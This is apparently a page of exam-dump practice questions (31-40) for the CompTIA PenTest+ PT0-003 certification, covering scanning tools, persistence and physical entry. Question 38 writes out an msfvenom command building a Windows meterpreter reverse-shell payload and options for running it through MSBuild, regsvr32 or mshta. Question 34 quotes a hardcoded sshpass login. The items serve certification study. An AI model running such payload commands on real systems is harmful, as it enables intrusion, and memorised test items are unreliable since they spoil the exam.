Month End Sale Limited Time 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: simple70

Pass the CompTIA PenTest+ PT0-003 Questions and answers with CertsForce

Viewing page 4 out of 9 pages
Viewing questions 31-40 out of questions
Questions # 31:

Before starting an assessment, a penetration tester needs to scan a Class B IPv4 network for open ports in a short amount of time. Which of the following is the best tool for this task?

Options:

A.

Burp Suite


B.

masscan


C.

Nmap


D.

hping


Expert Solution
Questions # 32:

During an assessment, a penetration tester wants to extend the vulnerability search to include the use of dynamic testing. Which of the following tools should the tester use?

Options:

A.

Mimikatz


B.

ZAP


C.

OllyDbg


D.

SonarQube


Expert Solution
Questions # 33:

You are a security analyst tasked with hardening a web server.

You have been given a list of HTTP payloads that were flagged as malicious.

INSTRUCTIONS

Given the following attack signatures, determine the attack type, and then identify the associated remediation to prevent the attack in the future.

If at any time you would like to bring back the initial state of the simulation, please click the Reset All button.

Question # 33


Expert Solution
Questions # 34:

In a file stored in an unprotected source code repository, a penetration tester discovers the following line of code:

sshpass -p donotchange ssh admin@192.168.6.14

Which of the following should the tester attempt to do next to take advantage of this information? (Select two).

Options:

A.

Use Nmap to identify all the SSH systems active on the network.


B.

Take a screen capture of the source code repository for documentation purposes.


C.

Investigate to find whether other files containing embedded passwords are in the code repository.


D.

Confirm whether the server 192.168.6.14 is up by sending ICMP probes.


E.

Run a password-spraying attack with Hydra against all the SSH servers.


F.

Use an external exploit through Metasploit to compromise host 192.168.6.14.


Expert Solution
Questions # 35:

A penetration tester is conducting reconnaissance on a target network. The tester runs the following Nmap command: nmap -sv -sT -p - 192.168.1.0/24. Which of the following describes the most likely purpose of this scan?

Options:

A.

OS fingerprinting


B.

Attack path mapping


C.

Service discovery


D.

User enumeration


Expert Solution
Questions # 36:

During a security assessment, a penetration tester wants to compromise user accounts without triggering IDS/IPS detection rules. Which of the following is the most effective way for the tester to accomplish this task?

Options:

A.

Crack user accounts using compromised hashes.


B.

Brute force accounts using a dictionary attack.


C.

Bypass authentication using SQL injection.


D.

Compromise user accounts using an XSS attack.


Expert Solution
Questions # 37:

A penetration tester attempts unauthorized entry to the company's server room as part of a security assessment. Which of the following is the best technique to manipulate the lock pins and open the door without the original key?

Options:

A.

Plug spinner


B.

Bypassing


C.

Decoding


D.

Raking


Expert Solution
Questions # 38:

A tester plans to perform an attack technique over a compromised host. The tester prepares a payload using the following command:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.12.12.1 LPORT=10112 -f csharp

The tester then takes the shellcode from the msfvenom command and creates a file called evil.xml. Which of the following commands would most likely be used by the tester to continue with the attack on the host?

Options:

A.

regsvr32 /s /n /u C:\evil.xml


B.

MSBuild.exe C:\evil.xml


C.

mshta.exe C:\evil.xml


D.

AppInstaller.exe C:\evil.xml


Expert Solution
Questions # 39:

Which of the following could be used to enhance the quality and reliability of a vulnerability scan report?

Options:

A.

Risk analysis


B.

Peer review


C.

Root cause analysis


D.

Client acceptance


Expert Solution
Questions # 40:

A penetration tester wants to maintain access to a compromised system after a reboot. Which of the following techniques would be best for the tester to use?

Options:

A.

Establishing a reverse shell


B.

Executing a process injection attack


C.

Creating a scheduled task


D.

Performing a credential-dumping attack


Expert Solution
Viewing page 4 out of 9 pages
Viewing questions 31-40 out of questions